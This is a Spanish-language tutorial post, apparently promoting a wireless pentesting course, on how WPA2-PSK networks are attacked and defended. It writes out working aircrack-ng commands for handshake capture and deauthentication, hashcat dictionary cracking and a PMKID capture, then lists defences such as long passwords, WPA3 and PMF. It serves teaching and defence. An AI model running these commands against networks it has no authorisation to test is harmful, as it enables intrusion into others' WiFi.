Cómo funciona un ataque a WPA2 (y cómo protegerte)

⚠️ Aviso legal: este artículo es educativo. Audita únicamente redes de tu propiedad o con autorización explícita. Atacar redes ajenas es delito.

WPA2-PSK protege la mayoría de las redes WiFi domésticas. Entender cómo se ataca es la mejor forma de aprender a defenderlo bien.

La base: PSK, PMK y el handshake

Cuando configuras una contraseña WiFi, de ella se deriva la PMK (Pairwise Master Key). Al conectarte, tu dispositivo y el router negocian las claves de sesión mediante el 4-way handshake (EAPOL). Ese intercambio contiene el material que permite verificar la contraseña offline — y es justo lo que un auditor captura.

Ataque clásico: capturar el handshake

En un laboratorio legal, el flujo es:

# 1. Tarjeta en modo monitor
sudo airmon-ng start wlan0

# 2. Escuchar redes y fijar el objetivo (BSSID + canal)
sudo airodump-ng wlan0mon

# 3. Capturar el handshake del objetivo
sudo airodump-ng --bssid AA:BB:CC:DD:EE:FF -c 6 -w captura wlan0mon

# 4. Forzar una reconexión para que aparezca un cliente (deauth)
sudo aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF wlan0mon

Con el handshake capturado, el crackeo es offline (no se vuelve a tocar la red):

# Convertir y crackear con hashcat (modo WPA = 22000)
hcxpcapngtool -o hash.22000 captura.pcapng
hashcat -m 22000 hash.22000 rockyou.txt

Ataque PMKID: sin clientes conectados

El ataque PMKID (descubierto por hashcat) permite obtener el material sin esperar a que nadie se conecte, directamente del router si lo soporta:

sudo hcxdumptool -i wlan0mon -o captura.pcapng

Esto lo hace mucho más sigiloso que el deauth.

El punto clave: todo depende del diccionario

El crackeo de WPA2 no rompe el cifrado, prueba contraseñas de un diccionario contra el handshake. Por eso:

  • Una contraseña como verano2024 cae en segundos.
  • Una de 16+ caracteres aleatorios es, a efectos prácticos, inviable.

Cómo protegerte de verdad

  • Contraseña larga y aleatoria (≥16 caracteres). Es la defensa nº1.
  • Migra a WPA3: su intercambio SAE (Dragonfly) hace inviable el ataque de diccionario offline. (Ojo: WPA3 tuvo fallos —Dragonblood— ya parcheados; mantén el firmware actualizado.)
  • Activa PMF (802.11w): protege los management frames y mitiga los deauth.
  • Desactiva WPS, vulnerable a pixie-dust.

¿Quieres practicar auditoría WiFi en un entorno 100% legal y con material real? Es exactamente lo que enseñamos en el curso HCWP – Hacknode Certified Wireless Pentester.